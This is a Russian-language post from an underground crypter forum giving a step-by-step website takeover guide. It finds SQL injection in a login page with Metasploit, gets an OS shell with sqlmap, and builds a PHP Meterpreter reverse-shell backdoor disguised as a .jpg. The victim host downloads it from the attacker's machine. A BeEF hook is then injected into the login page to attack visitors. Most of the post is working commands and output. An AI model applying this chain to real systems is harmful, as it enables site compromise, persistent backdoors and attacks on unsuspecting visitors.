FuckAV - Форум о крипторах

Анонимный антивирусный сканер VPN-сервис
[Copi]Team DDoS Service

SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN

Реклама на форуме | Помощь форуму | Аварийный блог

Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!!

Вернуться  

Статьи Раздел с интересными статьями!

Для того, чтобы ответить в теме, необходимо зарегистрироваться.
 
Опции темы Опции просмотра
Prev Предыдущее сообщение   Следующее сообщение Next
Старый 30-03-2014   #2
NoLimit
Topic starter

Windows v.2.03

Последняя активность:
03-04-2014
Регистрация: 24.11.2013
Сообщений: 16
Поблагодарили всего: 1
за это сообщение: 0
По умолчанию Re: Взлом сайтов с помощью Metasploit

SQL-инъекция с помощью Metasploit

Если Вы хотите проверить, подвержен ли какой-либо параметр SQL-инъекции или нет, то Вы можете попробовать проверить его с помощью Metasploit. Для этого мы будем использовать модуль auxiliary/scanner/http/blind_sql_query.

1. После сканирования плагином WMAP, мы знаем, что страница [Ссылки могут видеть только зарегистрированные пользователи.] имеет уязвимость SQL Injection и она имеет 2 параметра: username, password. Сейчас мы попытаемся проверить параметр username с помощью модуля auxiliary/scanner/http/blind_sql_query.

msf > use auxiliary/scanner/http/blind_sql_query
msf auxiliary(blind_sql_query) > show options



2. Указываем данные целевой страницы.

msf auxiliary(blind_sql_query) > set DATA username=hacker&password=password&submit=login
msf auxiliary(blind_sql_query) > set METHOD POST
msf auxiliary(blind_sql_query) > set PATH /WackoPicko/users/login.php
msf auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138



3. Запускаем тестирование.

msf auxiliary(blind_sql_query) > run



Результат: параметр "username" имеет уязвимость SQL Injection. Вы можете проверить другую технику SQL инъекций [Error Based Technique] с помощью модуля auxiliary/scanner/http/error_sql_injection.

Теперь мы знаем параметр "username" страницы users/login.php, имеющий уязвимость, и мы используем эту уязвимость для завладения веб-сайтом с помощью sqlmap. SQLMap - известный инструмент для SQL-инъекций, прекрасно работающий с Metasploit.

1. Мы будем использовать 3 опции sqlmap для этой атаки.

-u URL url цели
-data=DATA Строка данных, отправляемая через POST-запрос
-random-agent Использование случайно выбранных HTTP User-Agent заголовков
-os-shell Вызов интерактивной оболочки операционной системы

2. Теперь запустим sqlmap с деталями, которые у нас имеются. После этой команды, если пользователь, использующий данное приложение (веб-сайт), имеет достаточно привилегий, мы сможем получить шелл. (ниже - вывод из процесса SQLMap для загрузки шелла.)

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
"http://192.168.77.138/WackoPicko/users/login.php" --data
"username=hacker&password=password&submit=logi n" --os-shell



При появлении:
'http://192.168.77.138/WackoPicko/users/home.php'. Do you want to follow?
Выбираем:
[Y/n] Y



Сейчас мы находимся в целевой машине и создадим бэкдор для легкого бэкконнекта и легкой компрометации этой машины.

3. Мы создадим бэкдор с помощью Metasploit (команда msfvenom).

root@bt:~# msfvenom
no options
Usage: /opt/metasploit/msf3/msfvenom [options] <var=val>

Опции:



root@bt:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.77.137
LPORT=443 -f raw > /var/www/bd.php
root@bt:~# mv /var/www/bd.php /var/www/bd.jpg

4. В оболочке целевой машины скачайте бэкдор и измените его имя на bd.php.

os-shell> wget http://192.168.77.137/bd.jpg



5. Создайте обработчик для ожидания обратного соединения из bd.php.

root@bt:~# msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp
LHOST=192.168.77.137 LPORT=443 E




6. Запустим бэкдор в веб-браузере. А теперь мы получили Meterpreter в нашей Metasploit консоли



Сейчас мы завладели компьютером и можем делать все, что хотим с помощью Metasploit. В дальнейшем мы будем использовать BeEF для компрометации жертв, которые посетят веб-сайт на этой машине.


Metasploit с BeEF плагином

И последним в этой статье мы будем использовать Metasploit с [Ссылки могут видеть только зарегистрированные пользователи.] (Browser Exploit Framework).

1. Запускаем службу beef
root@bt:/pentestbeef -x -v

2. Переходим к директории плагинов Metasploit и загружаем BeEF из “[Ссылки могут видеть только зарегистрированные пользователи.]

$ cd /pentest/exploits/framework/msf3
$ git clone [Ссылки могут видеть только зарегистрированные пользователи.]



3. Перемещаем файл beef.rb в msf/plugins и lib/beef в msf/lib
$root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/lib/beef lib/
$root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/plugins/beef.rb plugins/

4. Устанавливаем hpricot,json gem
$ root@bt:/pentest/exploits/framework/msf3# gem install hpricot json

5. В Metasploit консоли загружаем BeEF плагин.
msf> load beef



6. Подключаемся к BeEF
msf> beef_connect
msf > beef_connect [Ссылки могут видеть только зарегистрированные пользователи.] beef beef



7. На этом шаге мы хотим запустить скрипт BeEF на любом клиенте, который посетит страницу входа. Возвращаемся к шеллу Meterpreter, который мы получили на последнем этапе атаки sqlmap. Скачиваем страницу login.php. Добавляем скрипт в файл и загружаем его на хост-машину.

meterpreter > download login.php .



root@bt:~# echo "[путь к скрипту через теги <script>]" >> login.php



meterpreter > upload login.php

Теперь при посещении жертвой страницы авторизации запустится скрипт BeEF.

8. Перейдем к веб-интерфейсу управления BeEF ([Ссылки могут видеть только зарегистрированные пользователи.]), войдя с именем “beef” и паролем “beef”.




9. Если кто-нибудь посетит страницу login.php, то будет атакован BeEF и в левой панели отобразится список жертв.



Для просмотра подробностей о жертве кликните по списку и они появятся в правой панели.



Также мы можем проверить список жертв из консоли Metasploit командой beef_online.

msf > beef online



Если Вы хотите проверить подробности о жертве в консоли Metasploit, используйте команду beef_target.

msf > beef_target



msf > beef_target -i 0



10. Сейчас можно запустить BeEF с командой beef_target

msf > beef_target -c 0 47



После запуска команды beef_target в BeEF консоли, BeEF может использовать команду "Человек-в-браузере" для жертвы.




Заключение

Теперь вы знаете, что Metasploit можно использовать для пентеста веб-сайтов, хотя и ограниченно. Им нельзя проверить веб-приложения на все типы уязвимостей, но он расширяем за счет других инструментов. Например, проверить сайт на наличие XSS (Cross-Site Scripting) можно, используя связку Metasploit + BeEF. Metasploit он не может проверить наличие уязвимости Remote File Inclusion, но он может создать бэкдор для этого. В будущем, возможно, Metasploit сможет тестировать их все. Если вы хотите научиться атаковать компьютеры, Metasploit будет отличным выбором для изучения всех векторов атак на компьютер.

[Ссылки могут видеть только зарегистрированные пользователи.]
NoLimit вне форума  
Для того, чтобы ответить в теме, необходимо зарегистрироваться.

Метки
auxiliary, metasploit, взлом, помощью, сайтов


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сайтов с помощью Metasploit NoLimit Корзина 1 30-03-2014 21:23
Взлом сайтов, почты, форумов Bobi Master Работа/Услуги 4 24-07-2012 09:10
Взлом базы данных сайтов zippers Видео 23 16-02-2011 09:49
Троян с помощью Metasploit RoMu4 Статьи 12 09-12-2010 15:13
Получение прибыли с помощью системы раскрутки сайтов Dave Статьи 2 30-05-2010 00:54

Часовой пояс GMT +3, время: 22:50.



Powered by vBulletin® Copyright ©2000 - 2014, Jelsoft Enterprises Ltd. Перевод: zCarot
Други: SEO блог Deymos'a| ProLogic.Su| DServers.ru| Форум веб-мастеров